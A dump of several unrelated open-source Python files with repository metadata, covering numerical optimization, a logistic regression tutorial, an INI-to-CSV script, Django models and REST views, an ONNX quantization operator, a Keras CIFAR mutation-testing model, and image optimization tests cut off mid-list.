search_direction, f1 = self.step_getter(X, subkey, t)
newton_decrement_squared = -f1.dot(search_direction)
# check if valid search direction
if newton_decrement_squared < 0:
if full_path:
full_path_arr.append((X.copy(), time.time()))
if full_vals:
vals_arr.append((self.obj.f(X)[0], time.time()))
continue
newton_decrement = np.sqrt(np.abs(newton_decrement_squared))
if self.verbose:
print("Newton Decrement Squared", newton_decrement_squared)
print("Obj", float(self.obj.f(X)[0]))
print("Steps Remaining", self.loop_steps_remaining)
print()
# Check if completed
if newton_decrement**2 < self.delta:
break
# do line search
alpha = self.linesearch(X[0], search_direction, f1, t)
# update step #1/(1 + newton_decrement) *
X[0] = X[0] + alpha * search_direction
if full_path:
full_path_arr.append((X.copy(), time.time()))
if full_vals:
vals_arr.append((self.obj.f(X)[0], time.time()))
# clean up after update (i.e. BFGS update)
self.jrandom_key, subkey = jrandom.split(self.jrandom_key)
self.post_step(X, subkey, t)
if full_path:
return X, full_path_arr
if full_vals:
return X, vals_arr
return X, None
def step_getter(self, X, jrandom_key, t):
pass
def post_step(self, X, jrandom_key, t):
pass
class Gradient_Descent(UnconstrainedOptimization):
def __init__(self, config):
super().__init__(config)
def step_getter(self, X, jrandom_key, t):
return -self.obj.f1(X)[0], self.obj.f1(X)[0]
class GaussianSmoothingOptimization(UnconstrainedOptimization):
def __init__(self, config):
super().__init__(config)
self.sigma = config["optimization_meta"]["sigma"]
self.d_prime = config["optimization_meta"]["d_prime"]
self.smoothing = GaussianSmoothing(self.obj, config["optimization_meta"]["num_samples"], config["optimization_meta"]["sigma"])
@partial(jax.jit, static_argnums=(0,))
def step_getter(self, X, jrandom_key, t):
sigma = self.sigma
# sigma = sigma * jnp.e**(- 0.0001 * t)
jrandom_key, subkey = jrandom.split(jrandom_key)
approx_H = self.smoothing.f2(X, subkey, sigma)[0]
jrandom_key, subkey = jrandom.split(jrandom_key)
f1 = self.smoothing.f1(X, subkey, sigma)[0]
search_direction = -jnp.linalg.inv(approx_H).dot(f1)
return search_direction, f1
# class BFGS(UnconstrainedOptimization):
# def __init__(self, config):
# super().__init__(config)
# self.H_inv = np.eye(config["domain_dim"])
# self.X_prev = None
# def step_getter(self, X, jrandom_key, t):
# self.X_prev = X[0].copy()
# f1 = self.combined_F.f1(X)
# return -self.H_inv.dot(f1[0])
# def post_step(self, X, jrandom_key, t):
# self.H_inv = BFGS_update(self.combined_F, self.X_prev, X[0], self.H_inv)
def helper_linesearch(obj, c1, c2):
def helper(x_0, search_direction, f1, t):
f0 = obj.f(x_0.reshape(1, -1))[0]
dg = jnp.inner(search_direction, f1)
def armijo_rule(alpha):
return obj.f((x_0 + alpha * search_direction).reshape(1, -1))[0] > f0 + c1*alpha*dg
def armijo_update(alpha):
return c2*alpha
alpha = 1
while armijo_rule(alpha):
alpha = armijo_update(alpha)
return alpha
return helper
| [
"daniel.lengyel@berkeley.edu"
] | daniel.lengyel@berkeley.edu |
5172cab88859eb1b658049d394587109ef3cccaa | 118c520121813b23d9307fb379d4d9406adef2e4 | /03_Classification/logistic_regression.py | bb3bfa5540aa92fb7d3c945e1c807de8a199a5e6 | [] | no_license | a-bautista/machine-learning-udemy | 63735c9f00544c3a79d395d00afa45d395cc7316 | 2632cab6e40dcecdc330e77c024f9ef21c65159b | refs/heads/master | 2021-04-18T19:37:16.347178 | 2019-04-10T05:02:16 | 2019-04-10T05:02:16 | 126,140,328 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,088 | py | # !Python 3.5.2
# Author: Alejandro Bautista Ramos
# Importing the libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
from matplotlib.colors import ListedColormap
def main():
data_processing()
def data_processing():
# ---------------------------------------- Retrieve the dataset --------------------------------------------- #
dataset = pd.read_csv("C:\\Users\\abautista\\PycharmProjects\\Machine_Learning_000\\csv_files\\Social_Network_Ads.csv")
# take all the columns except the last one for your matrix of features
X = dataset.iloc[:, [2,3]].values
y = dataset.iloc[: ,4].values
# ------------------------ Splitting the dataset into Training set and Test set ------------------------------------ #
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
# ------------------------------------------ Feature scaling ------------------------------------------------------- #
sc_X = StandardScaler()
# we scale our training set variables to avoid domination of one big variable against the others and then we apply the changes
# with fit_transform
X_train = sc_X.fit_transform(X_train)
# we scale the variables in our test set but we do not fit in our test set because we already fit in our training set
X_test = sc_X.transform(X_test)
# ------------------------------------- Fitting Logistic Regression ---------------------------------------------- #
classifier = LogisticRegression(random_state=0)
classifier.fit(X_train, y_train)
# ----------------------------------- Predicting the Test Set Results -------------------------------------------- #
y_pred = classifier.predict(X_test)
print("Results: \n", y_pred)
# ----------------------------------- Making the confusion matrix ----------------------------------------------- #
cm = confusion_matrix(y_test, y_pred)
print("Confusion matrix: \n",cm)
# ---------------------------------- Visualizing the Training set results ---------------------------------------- #
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() -1, stop = X_set[:, 0].max() + 1, step = 0.01),\
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label=j)
plt.title('Logistic Regression (Training Set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# ---------------------------------- Visualizing the Test set results ---------------------------------------- #
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() -1, stop = X_set[:, 0].max() + 1, step = 0.01),\
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label=j)
plt.title('Logistic Regression (Test Set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
if __name__ == "__main__":
main()
| [
"alex.bautista.ramos.90@gmail.com"
] | alex.bautista.ramos.90@gmail.com |
fcd62d09668e2e1f3fe8eca20e9315837789c1fd | e4f9e39ba878211e0257430376e9d69658b24d1d | /DataBase_Results_ver0.1/perform_spec2000_ncore_CINT_2csv.py | 484023f76f15277d194ba63ec8117c2e390b7666 | [] | no_license | jianxiamage/DataBase_Project | 4e8eb422dda8a1feeeec29673c877377e10a16f8 | ce4475f7d1eb9a512a4b7e60ca625ab3044f23e7 | refs/heads/master | 2021-03-11T17:11:17.568626 | 2020-03-20T06:51:49 | 2020-03-20T06:51:49 | 246,545,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,607 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys #引入模块
import os
import traceback
import ConfigParser
reload(sys)
sys.setdefaultencoding('utf-8')
#防止自动将ini文件中的键名转换成小写
class myconf(ConfigParser.ConfigParser):
def __init__(self,defaults=None):
ConfigParser.ConfigParser.__init__(self,defaults=None)
def optionxform(self, optionstr):
return optionstr
#将ini文件中的section内容写入csv文件开头,用以标明各个字段名称
#注意的是写入section行到csv时是覆盖模式"w")
def read_iniHead(inputFile,outputFile):
config = myconf()
config.readfp(open(inputFile))
f = open(outputFile,"w")
options = config.options('spec2000-ncore-CINT')
optionStr = ','.join(options)
print(optionStr)
f.write(optionStr+'\n')
#将各个字段的值写入csv文件
def read_ini(inputFile,outputFile):
config = myconf()
config.readfp(open(inputFile))
f = open(outputFile,"a")
j=1
dicts = {}
section = 'spec2000-ncore-CINT'
for option in config.options(section):
dicts[option] = config.get(section, option)
value = dicts[option]
#print 'section:%s,option:%s,value:%s' %(section,option,value)
print(value)
j = j + 1
print('===============================================')
values = dicts.values()
#print(values)
values_Str = ','.join(values)
print(values_Str)
f.write(values_Str+'\n')
print('===============================================')
return 0
if __name__=='__main__':
try:
MaxCount=3 #并发节点最大为3个
iniFileName='spec2000-ncore_CINT_1.ini'
csvFileName='spec2000-ncore_CINT.csv'
result_code = read_iniHead(iniFileName,csvFileName)
iniFilePre = 'spec2000-ncore_CINT_'
iniFileEnd = '.ini'
#遍历所有并发节点ini文件(正常情况下为:3个)
for i in range(1,MaxCount+1):
iniFileName=iniFilePre+str(i)+iniFileEnd
print(iniFileName)
print('-----------------------')
result_code = read_ini(iniFileName,csvFileName)
#单个文件写入逻辑
#result_code = read_ini(iniFileName,csvFileName)
#retCode = result_code
#print('---------------------------------')
#print 'retCode is:%s' %(retCode)
#print('---------------------------------')
except Exception as E:
#print('str(Exception):', str(Exception))
print('str(e):', str(E))
#print('repr(e):', repr(E))
#print('traceback.print_exc(): ', traceback.print_exc())
| [
"jianxiamage@163.com"
] | jianxiamage@163.com |
239f50c79dd17cfe7a1322e937ba0f328b6160ea | 8f265edd1c8dd292b7d5163b14d8bb59087cd221 | /.history/concert/ticketSales/models_20210721234452.py | 0fd5e605d6887a05e690034190de3497687b75d7 | [] | no_license | marabpour/ConcertReservation | 8d81b89806db4838a5f833109c4a15e1303133cf | c8726c8186c392c2aa68bd08d43df20aada2727b | refs/heads/main | 2023-07-12T01:15:49.610834 | 2021-08-02T10:08:41 | 2021-08-02T10:08:41 | 391,527,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | from django.db import models
# Create your models here.
class concertModel(models.Model):
Name=models.CharField(max_length=100)
SingerName=models.CharField(max_length=100)
length=models.IntegerField()
def __str__(self):
return self.SingerName
class locationModel(models.Model):
IdNumber=models.IntegerField(primary_key=True)
Name=models.CharField(max_length=100)
Address=models.CharField(max_length=500,default="تهران-برج میلاد")
Phone=models.CharField(max_length=11,null=True)
Capacity=models.IntegerField()
def __str__(self):
return self.Name
class timeModel(models.Model):
Concert=models.ForeignKey(concertModel,on_delete=models.PROTECT)
Location=models.ForeignKey(locationModel,on_delete=models.PROTECT)
StartDateTime=models.DateTimeField()
Seats=models.IntegerField()
| [
"baran.arabpour@gmail.com"
] | baran.arabpour@gmail.com |
735978fe2022e5282e9cfd6f5482ac533e740fc2 | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/cifar/mutants/mutant28.py | 19cad1bdf036b947307a97f300c8a7c7d43b5cce | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,822 | py | import keras
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.datasets import cifar10
from keras.layers import Dense, Activation, Flatten, Dropout, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
def train_model(x_train, y_train, x_test, y_test, model_name):
num_classes = 10
batch_size = 32
epochs = 25
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same', input_shape=\
x_train.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding=''))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-06)
model.compile(loss='categorical_crossentropy', optimizer=\
opt, metrics=\
['accuracy'])
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
model.fit(x_train, y_train, batch_size=\
batch_size, epochs=\
epochs, validation_data=\
(x_test, y_test), shuffle=\
True)
model.save(model_name)
scores = model.evaluate(x_test, y_test, verbose=1)
return (scores[0], scores[1]) | [
"gunel71@gmail.com"
] | gunel71@gmail.com |
25be5ada9a19e6c17fe33f959be3ecf452cd4e8e | c8c0d3e83dbec83ccb89a751dc3e656bb482a2ce | /ZombieGame/modules/timer.py | f5e15b11ecb24d468562459b6766baa19904fa42 | [] | no_license | Yamase31/python-zombie-game | 80658bcfcb05b819265dfc75c5563391f19b1861 | dfd931ecf5caac9348b652862fc0b018979491d9 | refs/heads/main | 2023-07-07T08:58:43.314898 | 2021-08-10T00:33:36 | 2021-08-10T00:33:36 | 394,479,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from random import randint
class Timer(object):
"""
Object that ticks down from a set value.
The value is reset to a random amount between
minValue and maxValue.
"""
# Timers for zombies and item
TIMER_ZOMBIE_MIN = 5
TIMER_ZOMBIE_MAX = 10
TIMER_ITEM_MIN = 10
TIMER_ITEM_MAX = 15
def __init__(self, minValue, maxValue):
self.minValue = minValue
self.maxValue = maxValue
self.reset()
def tick(self):
self.counter -= 1
def isDone(self):
return self.counter <= 0
def reset(self):
self.counter = randint(self.minValue, self.maxValue) | [
"noreply@github.com"
] | Yamase31.noreply@github.com |
e3ac68071a6eff0398b5b8462979d4f472aa6db9 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc031/D/3472289.py | 87e6ab70910a2e64fa5cbb2deb4bfa8dede46447 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 686 | py | k,n = map(int,input().split())
a = []
for i in range(n):
x,y =input().split()
a.append([x,y])
for i in range(3**k):
b = []
while i:
c = i %3
b.append(c+1)
i = (i-c)//3
while len(b) < k:
b.append(1)
ans = [[None] for i in range(k)]
flag = 0
for j in range(n):
kazu = a[j][0]
mozi = a[j][1]
for l in kazu:
l = int(l)-1
kon = mozi[:b[l]]
mozi = mozi[b[l]:]
if ans[l] == [None]:
ans[l] = kon
else:
if ans[l] != kon:
flag = 1
break
if mozi != "":
flag = 1
break
if flag == 0:
for j in range(k):
print(ans[j])
exit() | [
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
eb2ad42772a6494b5c6be782285061d8a6aba402 | 4520f56d4952c788e198ee7eee39911c9a76c60f | /01_Jump_to_python/0_example/6_0705/greet_user.py | f5b06332ed72e03fbd804e71a04069abccde9117 | [] | no_license | SuHyeonJung/iot_python2019 | bef8877a1cd41981ad2125291f5af44f4fd1701c | 7860630ae28c53677a3c2761c9e997b28ea55f26 | refs/heads/master | 2020-06-14T22:18:27.503781 | 2019-11-08T05:50:41 | 2019-11-08T05:50:41 | 195,142,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | # import sys
# # args = sys.argv[1:]
# # for i in args:
# # print("Hello,"+i.upper()[0]+i[1:]+"!")
def greet_users(usernames):
username = ['janny', 'hannah', 'margot', 'kevin', 'min']
for i in username:
print("Hello,"+i.upper()[0]+i[1:]+"!")
greet_users(1)
| [
"galma94815@naver.com"
] | galma94815@naver.com |
02cd6046e07b44a1bc4a490c27ff00e3b0dfd1e2 | 654eafecd9c70f30100c5a2f5928880c14892b71 | /src/transmogrifier_ploneblueprints/users.py | 89fc7e63180d471679f0f0dd7fcd8d07ee5b0aca | [] | no_license | datakurre/transmogrifier_ploneblueprints | 5f6bb420d464e08a030d37d1f5c35a12de388646 | ad9c7e1ab43c4178a0ae9b3f19e6ce77183f5b16 | refs/heads/master | 2020-12-23T02:02:47.110049 | 2017-11-05T20:02:36 | 2017-11-05T20:02:36 | 28,266,208 | 0 | 2 | null | 2017-08-04T11:52:32 | 2014-12-20T12:14:40 | Python | UTF-8 | Python | false | false | 1,909 | py | # -*- coding: utf-8 -*-
from plone import api
from transmogrifier.blueprints import Blueprint
from transmogrifier.blueprints import ConditionalBlueprint
from venusianconfiguration import configure
@configure.transmogrifier.blueprint.component(name='plone.users.get')
class GetUsers(Blueprint):
def __iter__(self):
for item in self.previous:
yield item
portal = api.portal.get()
pas = portal.acl_users
source_users = pas.source_users
for user_id in source_users.getUserIds():
properties = pas['mutable_properties']._storage.get(user_id)
roles = pas.portal_role_manager._principal_roles.get(user_id)
# ensure isUser is True, properties is None for default users
if properties is not None:
properties['isGroup'] = False
item = {
'id': user_id,
'login': source_users.getLoginForUserId(user_id),
'properties': properties,
'roles': roles
}
yield item
@configure.transmogrifier.blueprint.component(name='plone.users.set')
class SetUsers(ConditionalBlueprint):
def __iter__(self):
portal = api.portal.get()
pas = portal.acl_users
for item in self.previous:
if self.condition(item):
user_id = item['id']
login = item['login']
roles = item['roles']
properties = item['properties']
if user_id not in pas.source_users.getUserIds():
pas.source_users.addUser(user_id, login, '')
pas.portal_role_manager.assignRolesToPrincipal(roles, user_id)
# properties None for default users
if properties is not None:
pas.mutable_properties._storage[user_id] = properties
yield item
| [
"asko.soukka@iki.fi"
] | asko.soukka@iki.fi |
e624861b544e31329f7b153bd528e9d585c32c92 | fb76abc1b89e14a0b7a4a1f3cf21f2d6df484df4 | /server/routes/routes_home.py | e081c5d12b9962572128797a7438414280fa4139 | [
"MIT"
] | permissive | leohmoraes/firedash | 2f6bdaca5df1be138abc5f8476f3f8dfb965d768 | 324b04615bd454b7918261eaaa9b8380597195f1 | refs/heads/master | 2020-08-06T08:31:40.010655 | 2019-06-29T21:50:19 | 2019-06-29T21:50:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | import os
from flask import render_template, Blueprint, send_from_directory, current_app
routes_home = Blueprint('home', __name__)
@routes_home.route('/', defaults={'path': ''})
@routes_home.route('/<path:path>')
def action_catch_all(path):
return render_template('index.html')
@routes_home.route('/favicon.ico')
def action_favicon():
return send_from_directory(
os.path.join(current_app.root_path, '..', '..', 'web-cli', 'dist', 'static'),
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
| [
"paulo@prsolucoes.com"
] | paulo@prsolucoes.com |
9b673b68addcdab5690a1057af9e25e6e234b6de | be026334d457b1f78050f8262cd693922c6c8579 | /onnxruntime/python/tools/quantization/operators/embed_layernorm.py | 1e96b7bd7508bc0adaaa3ae8d03ee0016056b10d | [
"MIT"
] | permissive | ConnectionMaster/onnxruntime | 953c34c6599c9426043a8e5cd2dba05424084e3b | bac9c0eb50ed5f0361f00707dd6434061ef6fcfe | refs/heads/master | 2023-04-05T00:01:50.750871 | 2022-03-16T15:49:42 | 2022-03-16T15:49:42 | 183,019,796 | 1 | 0 | MIT | 2023-04-04T02:03:14 | 2019-04-23T13:21:11 | C++ | UTF-8 | Python | false | false | 3,764 | py | import onnx
import logging
from .base_operator import QuantOperatorBase
from ..quant_utils import attribute_to_kwarg, ms_domain
from onnx import onnx_pb as onnx_proto
'''
Quantizes the EmbedLayerNorm fused ONNXRuntime Op.
This Quant operator keeps the input and segment IDs at int32 but will quantize all initializer and
weight inputs associated with the node to uint8.
'''
class EmbedLayerNormalizationQuant(QuantOperatorBase):
def __init__(self, onnx_quantizer, onnx_node):
super().__init__(onnx_quantizer, onnx_node)
def quantize(self):
node = self.node
assert (node.op_type == "EmbedLayerNormalization")
if len(node.output) > 2:
logging.info(f"Quantization is not applied to {node.name} since it has 3 outputs")
return super().quantize()
'''
Pre-quantization EmbedLayerNorm inputs:
[0] input_ids (int32)
[1] segment_ids (int32)
[2] word_embedding (float32)
[3] position_embedding (float32)
[4] segment_embedding (float32)
[5] gamma (float32)
[6] beta (float32)
[7] mask (int32) (optional)
'''
(quantized_input_names, zero_point_names, scale_names, nodes) = \
self.quantizer.quantize_inputs(node, [2, 3, 4, 5, 6])
if quantized_input_names is None:
return super().quantize()
qembed_layer_norm_name = "" if node.name == "" else node.name + "_quant"
'''
Quantized Input Tensor List
[0] input_ids (int32)
[1] segment_ids (int32)
[2] word_embedding (uint8)
[3] position_embedding (uint8)
[4] segment_embedding (uint8)
[5] gamma (uint8)
[6] beta (uint8)
[7] mask (int32) (optional)
[8] word_embedding_scale (float)
[9] position_embedding_scale (float)
[10] segment_embedding_scale (float)
[11] gamma_scale (float)
[12] beta_scale (float)
[13] word_embedding_zero_point (uint8)
[14] position_embedding_zero_point (uint8)
[15] segment_embedding_zero_point (uint8)
[16] gamma_zero_point (uint8)
[17] beta_zero_point (uint8)
'''
inputs = []
# 'input_ids'
inputs.extend([node.input[0]])
# 'segment_ids'
inputs.extend([node.input[1]])
# 'word_embedding_quant'
inputs.extend([quantized_input_names[0]])
# 'position_embedding_quant'
inputs.extend([quantized_input_names[1]])
# 'segment_embedding_quant'
inputs.extend([quantized_input_names[2]])
# 'gamma_quant'
inputs.extend([quantized_input_names[3]])
# 'beta_quant'
inputs.extend([quantized_input_names[4]])
# 'mask' (optional)
inputs.extend([node.input[7] if len(node.input) > 7 else ""])
# Add all scales:
inputs.extend([scale_names[0]])
inputs.extend([scale_names[1]])
inputs.extend([scale_names[2]])
inputs.extend([scale_names[3]])
inputs.extend([scale_names[4]])
# Add all zero points:
inputs.extend([zero_point_names[0]])
inputs.extend([zero_point_names[1]])
inputs.extend([zero_point_names[2]])
inputs.extend([zero_point_names[3]])
inputs.extend([zero_point_names[4]])
kwargs = {}
for attribute in node.attribute:
kwargs.update(attribute_to_kwarg(attribute))
kwargs["domain"] = ms_domain
qembed_layer_norm_node = onnx.helper.make_node("QEmbedLayerNormalization", inputs, node.output,
qembed_layer_norm_name, **kwargs)
nodes.append(qembed_layer_norm_node)
self.quantizer.new_nodes += nodes
| [
"noreply@github.com"
] | ConnectionMaster.noreply@github.com |
1df70ae22fccbeff3312dc64c4e1f42076504c0b | 5c1c6af292d91e70080b500fac0d8c0b751305f3 | /sciunit/utils.py | 3199273593f9e0c75b0852d750f973248128d2c5 | [
"MIT"
] | permissive | rgerkin/sciunit | ce3d56dc1754e03765bd3db7cad91c29b20f4260 | f0ce6ea79bd46c4500b4d79e85d40c3b1dbf8a58 | refs/heads/master | 2021-01-24T00:10:22.965603 | 2015-10-23T22:17:06 | 2015-10-23T22:17:06 | 8,079,154 | 0 | 1 | null | 2015-05-11T17:36:34 | 2013-02-07T18:48:47 | Python | UTF-8 | Python | false | false | 890 | py | """
Utility functions for SciUnit.
"""
from __future__ import print_function
from quantities.dimensionality import Dimensionality
from quantities.quantity import Quantity
PRINT_DEBUG_STATE = False # printd does nothing by default.
def printd_set(state):
global PRINT_DEBUG_STATE
PRINT_DEBUG_STATE = (state is True)
def printd(*args, **kwargs):
global PRINT_DEBUG_STATE
if PRINT_DEBUG_STATE:
print(*args, **kwargs)
def assert_dimensionless(value):
"""
Tests for dimensionlessness of input.
If input is dimensionless but expressed as a Quantity, it returns the
bare value. If it not, it raised an error.
"""
if type(value) is Quantity:
if value.dimensionality == Dimensionality({}):
value = value.base.item()
else:
raise TypeError("Score value %s must be dimensionless" % value)
return value | [
"rgerkin@asu.edu"
] | rgerkin@asu.edu |
9926460214a0bc3f2d699ba6c54b7cee0beae598 | 00d40264e44a0ff6ee6871c2264faa42a3c7b132 | /quiz/G2/Aybek Addullayev/back/quizBack/api/views.py | 8aaaf374c0f3c944bd2a400284358c801ed93733 | [] | no_license | Akmaralym/WD2019Spring | 09f878fec0f9f985fd44eed758e238d7439eb361 | a2b0dab4ed2024959018a511ad64c74e5acbd152 | refs/heads/master | 2021-05-18T04:14:19.114732 | 2019-05-20T05:29:26 | 2019-05-20T05:29:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,372 | py | from django.http import HttpResponse, Http404
from rest_framework.response import Response
from rest_framework import generics, status
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.views import APIView
from rest_framework.authtoken.models import Token
from rest_framework.decorators import api_view
from rest_framework.response import Response
from api.models import Contact
from api.serializers import ContactSerializer, UserSerializer
from rest_framework.permissions import IsAuthenticated
@api_view(['POST'])
def login(request):
serializer = AuthTokenSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({'token': token.key})
@api_view(['POST'])
def logout(request):
request.auth.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class ContactList(generics.ListCreateAPIView):
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return Contact.objects.for_user_order_by_name(self.request.user)
def get_serializer_class(self):
return ContactSerializer
def perform_create(self, serializer):
serializer.save(created_by=self.request.user)
class ContactDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Contact.objects.all()
serializer_class = ContactSerializer
class ContactDetail2(APIView):
def get_object(self, pk):
try:
return Contact.objects.get(id=pk)
except Contact.DoesNotExist:
raise Http404
def get(self, request, pk):
contact = self.get_object(pk)
serializer = ContactSerializer(contact)
return Response(serializer.data)
def put(self, request, pk):
contact = self.get_object(pk)
serializer = ContactSerializer(instance=contact, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def delete(self, request, pk):
contact = self.get_object(pk)
contact.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
| [
"bobur.muhsimbaev@gmail.com"
] | bobur.muhsimbaev@gmail.com |
d6f71e35c5fa54517d1c867a1c2d2b89274235fc | f72113a33217820b9bc16097568b041083802719 | /test/test_image.py | 1a297a9101d543c61e8cf457085a0ab9135169e8 | [
"BSD-3-Clause"
] | permissive | celestialized/yoga | 95d320446ae50e0ac3d5ac0eaf423f0aac344a19 | 67c2aff568c806a4e8c9d8ca7b875e9412e2738e | refs/heads/master | 2023-08-31T11:18:13.612232 | 2021-10-15T08:00:48 | 2021-10-15T08:00:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,883 | py | import io
import os
import pytest
from PIL import Image
import yoga.image
from yoga.image.encoders.jpeg import is_jpeg
from yoga.image.encoders.png import is_png
from yoga.image.encoders.webp import is_lossy_webp
from yoga.image.encoders.webp_lossless import is_lossless_webp
class Test_optimize(object):
@pytest.mark.parametrize(
"input_",
[
"test/images/alpha.png",
open("test/images/alpha.png", "rb"),
io.BytesIO(open("test/images/alpha.png", "rb").read()),
],
)
def test_input_file(self, input_):
output = io.BytesIO()
yoga.image.optimize(input_, output)
output.seek(0)
assert is_png(output.read())
def test_output_path(self, tmpdir):
output_path = os.path.join(str(tmpdir), "output1.png")
yoga.image.optimize("test/images/alpha.png", output_path)
output = open(output_path, "rb")
assert is_png(output.read())
def test_output_file(self, tmpdir):
output_path = os.path.join(str(tmpdir), "output2.png")
output = open(output_path, "wb")
yoga.image.optimize("test/images/alpha.png", output)
output.close()
output = open(output_path, "rb")
assert is_png(output.read())
def test_output_bytesio(self):
output = io.BytesIO()
yoga.image.optimize("test/images/alpha.png", output)
output.seek(0)
assert is_png(output.read())
@pytest.mark.parametrize(
"image_path,format_checker",
[
("test/images/image1.jpg", is_jpeg),
("test/images/unused-alpha.png", is_png),
("test/images/alpha.lossy.webp", is_lossy_webp),
("test/images/alpha.lossless.webp", is_lossless_webp),
],
)
def test_option_output_format_default(self, image_path, format_checker):
output = io.BytesIO()
yoga.image.optimize(image_path, output)
output.seek(0)
assert format_checker(output.read())
@pytest.mark.parametrize(
"image_path,format_,format_checker",
[
# fmt: off
("test/images/image1.jpg", "orig", is_jpeg),
("test/images/unused-alpha.png", "orig", is_png),
("test/images/alpha.png", "auto", is_png),
("test/images/unused-alpha.png", "auto", is_jpeg),
("test/images/image1.jpg", "auto", is_jpeg),
("test/images/image1.jpg", "jpeg", is_jpeg),
("test/images/unused-alpha.png", "jpeg", is_jpeg),
("test/images/image1.jpg", "png", is_png),
("test/images/unused-alpha.png", "png", is_png),
("test/images/alpha.lossy.webp", "webp", is_lossy_webp),
("test/images/alpha.lossy.webp", "orig", is_lossy_webp),
("test/images/alpha.lossless.webp", "webpl", is_lossless_webp),
("test/images/alpha.lossless.webp", "orig", is_lossless_webp),
# fmt: on
],
)
def test_option_output_format(self, image_path, format_, format_checker):
output = io.BytesIO()
yoga.image.optimize(image_path, output, {"output_format": format_})
output.seek(0)
assert format_checker(output.read())
def test_option_output_format_orig_with_unsuported_output_format(self):
output = io.BytesIO()
with pytest.raises(ValueError):
yoga.image.optimize(
"test/images/image.gif", output, {"output_format": "orig"}
)
@pytest.mark.parametrize(
"image_path,options,output_image_size",
[
# fmt: off
# IMAGE OPTIONS OUT IMG SIZE
# orig
["test/images/image1.jpg", {"resize": "orig"}, (256, 256)],
# size < image
["test/images/image1.jpg", {"resize": 128}, (128, 128)],
["test/images/image1.jpg", {"resize": 96}, (96, 96)],
# size > image
["test/images/image1.jpg", {"resize": 512}, (256, 256)],
# width, height
["test/images/image1.jpg", {"resize": "96x200"}, (96, 96)],
["test/images/landscape.png", {"resize": [64, 64]}, (64, 32)],
["test/images/landscape.png", {"resize": [96, 64]}, (96, 48)],
